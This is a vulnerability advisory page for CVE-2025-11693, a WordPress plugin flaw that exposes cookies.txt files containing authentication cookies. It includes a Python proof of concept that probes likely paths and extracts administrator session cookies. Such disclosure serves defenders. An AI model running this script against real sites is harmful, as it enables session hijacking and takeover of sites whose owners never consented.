Security Vulnerability Report
CVE-2025-11693 CVSS 9.8 CRITICAL

CVE-2025-11693

Published: 2025-12-13 16:16:45
Last Modified: 2026-04-15 00:35:42

Description

The Export WP Page to Static HTML & PDF plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.4 through publicly exposed cookies.txt files containing authentication cookies. This makes it possible for unauthenticated attackers to access cookies that may have been injected into the log file if the site administrator triggered a back-up using a specific user role like 'administrator.'

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Export WP Page to Static HTML & PDF <= 4.3.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11693 PoC - Cookie File Access
# Affected: Export WP Page to Static HTML & PDF <= 4.3.4
import requests
import re

target_url = "http://target-wordpress-site.com"

# Common paths where cookies.txt might be exposed
cookie_paths = [
    "/wp-content/plugins/export-wp-page-to-static-html/cookies.txt",
    "/wp-content/uploads/cookies.txt",
    "/cookies.txt",
    "/wp-content/cookies.txt",
    "/export-wp-page-to-static-html/cookies.txt"
]


def check_cookie_exposure():
    print("[*] Checking for exposed cookies.txt files...")
    for path in cookie_paths:
        url = target_url + path
        try:
            response = requests.get(url, timeout=10)
            if response.status_code == 200 and len(response.text) > 0:
                if "wordpress_logged_in" in response.text or "wordpress_sec_" in response.text:
                    print(f"[!] VULNERABLE: Found exposed cookie file at {url}")
                    print(f"[+] Content preview: {response.text[:500]}")
                    # Extract cookies
                    cookies = re.findall(r'(wordpress_logged_in_[^=]+=[^;]+)', response.text)
                    for cookie in cookies:
                        print(f"[*] Cookie: {cookie}")
                    return True
        except requests.RequestException as e:
            print(f"[-] Error accessing {url}: {e}")
    return False


if __name__ == "__main__":
    check_cookie_exposure()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11693", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:45.447", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Export WP Page to Static HTML & PDF plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.4 through publicly exposed cookies.txt files containing authentication cookies. This makes it possible for unauthenticated attackers to cookies that may have been injected into the log file if the site administrator triggered a back-up using a specific user role like 'administrator.'"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3388166%40export-wp-page-to-static-html&new=3388166%40export-wp-page-to-static-html&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cd28ac3c-aaef-49e3-843d-8532404703c9?source=cve", "source": "[email protected]"}]}}